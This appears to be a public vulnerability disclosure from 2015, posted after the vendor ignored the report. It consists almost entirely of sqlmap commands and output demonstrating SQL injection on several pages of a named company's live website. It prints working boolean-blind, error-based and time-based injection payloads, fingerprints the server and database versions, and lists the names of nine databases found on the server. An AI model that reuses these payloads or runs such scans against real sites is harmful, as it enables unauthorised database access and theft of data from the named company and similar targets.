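2015-10-13: Details reported to the vendor; awaiting vendor handling
2015-10-18: The vendor actively ignored the vulnerability; details disclosed to the public
Vendors should pay more attention to security.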
sqlmap.py -u "http://www.vcanbio.com/investor_articledetail.aspx?id=1'%22"
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=-5465 OR 9250=9250#

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: id=-6373 OR 1 GROUP BY CONCAT(0x716a626a71,(SELECT (CASE WHEN (1433=1433) THEN 1 ELSE 0 END)),0x71706b6a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: id=(SELECT (CASE WHEN (1125=1125) THEN SLEEP(5) ELSE 1125*(SELECT 1125 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: MySQL 5.0.12
available databases [9]:
[*] db_nmw
[*] hezedb
[*] information_schema
[*] mqmgssspglxt
[*] mysql
[*] rsdome
[*] scdb
[*] tj_hzdb
[*] vcanbio_zhongyuanxiehe
sqlmap.py -u "www.vcanbio.com//investor_announcementdetail.aspx?id=*"
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: http://www.vcanbio.com:80//investor_announcementdetail.aspx?id=-2175 OR 5046=5046#

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: http://www.vcanbio.com:80//investor_announcementdetail.aspx?id=-2495 OR 1 GROUP BY CONCAT(0x717a707071,(SELECT (CASE WHEN (6251=6251) THEN 1 ELSE 0 END)),0x71706a6a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: http://www.vcanbio.com:80//investor_announcementdetail.aspx?id=(SELECT (CASE WHEN (1716=1716) THEN SLEEP(5) ELSE 1716*(SELECT 1716 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: MySQL 5.0.12
current database: 'vcanbio_zhongyuanxiehe'
sqlmap.py -u "www.vcanbio.com//company_videodata_detail.aspx?id=*"
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: http://www.vcanbio.com:80//company_videodata_detail.aspx?id=-8794 OR 3019=3019#

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: http://www.vcanbio.com:80//company_videodata_detail.aspx?id=-3756 OR 1 GROUP BY CONCAT(0x7171627071,(SELECT (CASE WHEN (7398=7398) THEN 1 ELSE 0 END)),0x71626a7671,FLOOR(RAND(0)*2)) HAVING MIN(0)#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: http://www.vcanbio.com:80//company_videodata_detail.aspx?id=(SELECT (CASE WHEN (7617=7617) THEN SLEEP(5) ELSE 7617*(SELECT 7617 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: MySQL 5.0.12
current database: 'vcanbio_zhongyuanxiehe'
http://www.vcanbio.com//company_news_detail.aspx?id=*
Severity: No impact, ignored by vendor
Ignored at: 2015-10-18 09:46
Vulnerability Rank: 4 (WooYun rating)
None yet